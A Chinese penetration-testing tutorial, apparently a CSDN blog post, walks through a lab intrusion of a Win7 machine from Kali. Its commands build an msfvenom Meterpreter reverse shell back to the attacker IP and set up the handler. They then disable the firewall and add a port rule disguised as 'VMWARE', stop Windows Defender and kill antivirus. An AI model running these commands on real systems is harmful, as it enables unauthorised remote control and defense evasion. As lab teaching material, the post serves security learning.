当前位置:网站首页>内网渗透之内网信息收集(一)
内网渗透之内网信息收集(一)
2022-07-06 09:22:00 【不知名白帽】
目录
内网渗透之内网信息收集(二)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
01msf反弹shell
首先生成一个payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe
02msf反弹shell
配置反弹会话处理程序
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit
将payload发送到目标机器让其执行
执行成功
linux无法识别window汉字会乱码,修改一下代码页(65001代表的是UTF-8)
03通过shell关闭防火墙
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off (关闭防火墙)
netsh advfirewall show allprofiles (查看防火墙状况)
通过策略添加防火墙规则隐蔽行为
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
重启生效(令win7重启):
shutdown -r -f -t 0
04关闭杀毒软件
关闭windefend
net stop windefend
关闭杀毒软件
run killav
run post/windows/manage/killav
边栏推荐
- Have you encountered ABA problems? Let's talk about the following in detail, how to avoid ABA problems
- SRC挖掘思路及方法
- Using qcommonstyle to draw custom form parts
- 深度强化文献阅读系列(一):Courier routing and assignment for food delivery service using reinforcement learning
- PriorityQueue (large root heap / small root heap /topk problem)
- It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan
- Detailed explanation of three ways of HTTP caching
- 7-3 construction hash table (PTA program design)
- 7-3 构造散列表(PTA程序设计)
- The United States has repeatedly revealed that the yield of interest rate hiked treasury bonds continued to rise
猜你喜欢
[dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i
Strengthen basic learning records
"Gold, silver and four" job hopping needs to be cautious. Can an article solve the interview?
Programme de jeu de cartes - confrontation homme - machine
3. Input and output functions (printf, scanf, getchar and putchar)
HackMyvm靶机系列(6)-videoclub
记一次猫舍由外到内的渗透撞库操作提取-flag
Thoroughly understand LRU algorithm - explain 146 questions in detail and eliminate LRU cache in redis
Principles, advantages and disadvantages of two persistence mechanisms RDB and AOF of redis
强化学习基础记录
随机推荐
Read only error handling
[hand tearing code] single case mode and producer / consumer mode
PriorityQueue (large root heap / small root heap /topk problem)
Poker game program - man machine confrontation
Safe driving skills on ice and snow roads
Have you encountered ABA problems? Let's talk about the following in detail, how to avoid ABA problems
强化学习基础记录
7-6 local minimum of matrix (PTA program design)
.Xmind文件如何上传金山文档共享在线编辑?
Using spacedesk to realize any device in the LAN as a computer expansion screen
Experiment 4 array
7-8 7104 约瑟夫问题(PTA程序设计)
js判断对象是否是数组的几种方式
Experiment 9 input and output stream (excerpt)
实验五 类和对象
Nuxtjs快速上手(Nuxt2)
JS several ways to judge whether an object is an array
7-3 construction hash table (PTA program design)
Implementation principle of automatic capacity expansion mechanism of ArrayList
The difference between abstract classes and interfaces